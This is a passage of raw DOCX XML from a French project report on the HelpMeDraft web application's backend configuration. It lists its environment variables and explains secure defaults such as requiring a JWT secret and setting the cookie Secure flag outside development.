        <w:t xml:space="preserve">l'empaquetage, de sorte qu'une erreur de type échoue la construction plutôt que de se manifester à l'exécution.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkStart w:id="86" w:name="X59cfe21580654d1f87d5e9b0bfa5e40bc603409"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Configuration par variables d'environnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aucun secret n'est écrit dans le code. La configuration est lue depuis un fichier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— exclu du dépôt par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.gitignore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— dont</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.env.example</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">documente chaque variable avec son rôle et sa valeur attendue.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Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT_SECRET_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Signature des access tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">aucun — obligatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">APP_ENV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Environnement d'exécution ; pilote l'attribut</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">du cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">development</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MAIL_SERVER</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MAIL_PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Serveur SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MAIL_USERNAME</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MAIL_PASSWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Identifiants SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MAIL_USE_TLS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MAIL_USE_SSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chiffrement SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">True</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MAIL_DEFAULT_SENDER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Expéditeur des courriels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">OLLAMA_URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">URL du serveur d'inférence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">http://localhost:11434</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">OLLAMA_MODEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modèle utilisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>qwen2.5:3b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">FRONTEND_URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Base du lien de réinitialisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">http://localhost:5173</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>SECRET_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Clé de session Flask, distincte de JWT_SECRET_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>aucun — obligatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>CORS_ORIGINS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Origines autorisées, séparées par des virgules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>http://localhost:5173</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>HELPMEDRAFT_DB_URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>URL de la base ; SQLite en développement, MySQL en conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>sqlite:///HelpMeDraft.db</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>OLLAMA_NUM_CTX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Fenêtre de contexte transmise au modèle, en jetons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>4096</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>OLLAMA_KEEP_ALIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Durée de maintien du modèle en mémoire après un appel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>30m</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>OLLAMA_THINK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Mode raisonnement des modèles qui en ont un</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>OLLAMA_CONNECT_TIMEOUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Délai d'établissement de la connexion, en secondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>IA_MAX_CONTENU_LENGTH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Taille maximale du texte soumis au modèle, en caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JWT_SECRET_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">n'a délibérément aucune valeur de repli.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Une clé de secours écrite dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">config.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">permettrait à l'application de démarrer sans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, avec une clé connue de quiconque lit le dépôt : n'importe qui pourrait alors forger un access token valide pour n'importe quel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. L'application refuse donc de démarrer :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3465540" cy="789262"/>
            <wp:docPr id="35" name="Picture 35"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="34409ea4ec49-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3465540" cy="789262"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C'est le principe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">fail fast, fail loud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un échec bruyant au démarrage vaut mieux qu'un démarrage silencieusement vulnérable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">APP_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">pilote un comportement de sécurité, pas un affichage.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">En développement, le front tourne sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un cookie marqué</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ne serait jamais transmis, et l'authentification ne fonctionnerait pas. Hors développement,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devient obligatoire, sans quoi le refresh token pourrait transiter en clair sur HTTP et être capté.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2259375" cy="287920"/>
            <wp:docPr id="36" name="Picture 36"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="5b0b16e2dc6a-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2259375" cy="287920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le défaut est</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">development</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— le plus permissif — ce qui est le bon choix pour l'ergonomie mais impose de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">positionner explicitement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">APP_ENV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>à la mise en production. Cette étape figure dans la liste de contrôle de déploiement.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkStart w:id="87" w:name="Xb703d407babec277ce052cef14d98faeb56bd4c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>La fabrique d'application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le backend est construit par une fonction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">create_app()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">plutôt que par un objet</w:t>
      </w:r>
      <w:r>
